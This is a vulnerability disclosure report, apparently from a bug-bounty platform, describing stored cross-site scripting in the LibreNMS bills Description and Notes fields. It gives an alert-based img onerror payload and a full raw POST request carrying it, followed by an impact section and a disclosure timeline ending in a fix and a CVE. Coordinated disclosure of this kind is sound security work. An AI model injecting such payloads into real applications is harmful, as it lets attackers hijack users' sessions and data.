librenms bills Description & Notes Stored XSS in librenms/librenms

Valid

Reported on

Apr 12th 2022


Description

Please enter a description of the vulnerability.

Proof of Concept

  1. Login
  2. go to http://[librenms]/bills
  3. Click to Create Bill
  4. Add Description or Notes ["<img src=x onerror=alert(1);>"]
// PoC.js

payload_1 payload_2

POST /bills/ HTTP/1.1
Host: 192.168.0.4
Connection: keep-alive
Content-Length: 310
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: SERVER
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: SERVER/bills
Accept-Encoding: gzip, deflate
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: XSRF-TOKEN=eyJpdiI6Ik5Uek0vZm92NEZkRFI5WVJBd281aVE9PSIsInZhbHVlIjoiRlZ6UEx5V3hlc1NqMlUxMkhCU0Vhb21vVHNWVXhBZnMzZkk1blRVZVEycllXTVNTTFdRVzN1akN5eEw4OVFNYXZvM2Mxd1NpeFl6MHk3UEhSSUxraTBUbWkxMkVHMXc3ZHpaaUtkMHVuQ1dWS203V3Vka3BlMWJBOEpmSGdJWGEiLCJtYWMiOiI2ZGRmYjEwNGRiNjBmNjgwNjBkYmFlNzBmYTM5MWY5OTBhM2FjN2ZjY2E1ZTdiZDQ0Y2ViMmVlMGMxYjBiOTA0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImZTNlBZc05YdTc5cUE5cTBObmFCb0E9PSIsInZhbHVlIjoiaklYUE94bGNRWC9oYll2VW9oVHhwZlh2aEdQR29rdk00dTdXN1JUUS9JMHNMZHYrRGJMVnVGT3FnOVBZQU04NW9peWl6amgzM0NVcDNFVVNCTC9rRlVIV0JlejRwRGh1bDl3K1lENHRDNFNRVlUxTElGMDVsbmlWS3pBeGo1WWQiLCJtYWMiOiIyZjY5N2IzNTFkODBmY2U1ZTRhODc5ZTMyOTI3ZDQ0NjdlMTVjYzEyMTlhZmQ2N2IzODlkMmVjMTQyZDFlNDBmIiwidGFnIjoiIn0%3D

_token=lTMObTvhduJCjTDkvmk1I3u4Vuti8C0OGafrlL8J&addbill=yes&device=-1&bill_name=%22%3Cimg+src%3Dx+onerror%3Dalert%281%29%3B%3E%22&bill_type=cdr&bill_cdr=&bill_cdr_type=Mbps&dir_95th=in&bill_quota=&bill_quota_type=GB&bill_day=1&bill_custid=&bill_ref=&bill_notes=%22%3Cimg+src%3Dx+onerror%3Dalert%281%29%3B%3E%22

Impact

It allows an attacker to circumvent the same origin policy, which is designed to segregate different websites from each other. Cross-site scripting vulnerabilities normally allow an attacker to masquerade as a victim user, to carry out any actions that the user is able to perform, and to access any of the user's data. If the victim user has privileged access within the application, then the attacker might be able to gain full control over all of the application's functionality and data

We are processing your report and will contact the librenms team within 24 hours. 8 months ago
dnr6419 modified the report
8 months ago
We have contacted a member of the librenms team and are waiting to hear back 8 months ago
We have sent a follow up to the librenms team. We will try again in 7 days. 7 months ago
We have sent a second follow up to the librenms team. We will try again in 10 days. 7 months ago
We have sent a third and final follow up to the librenms team. This report is now considered stale. 7 months ago
Tony Murray validated this vulnerability a month ago
dnr6419 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Tony Murray marked this as fixed in 22.10.0 with commit 43cb72 a month ago
The fix bounty has been dropped
This vulnerability has been assigned a CVE
Tony Murray published this vulnerability 9 days ago
to join this conversation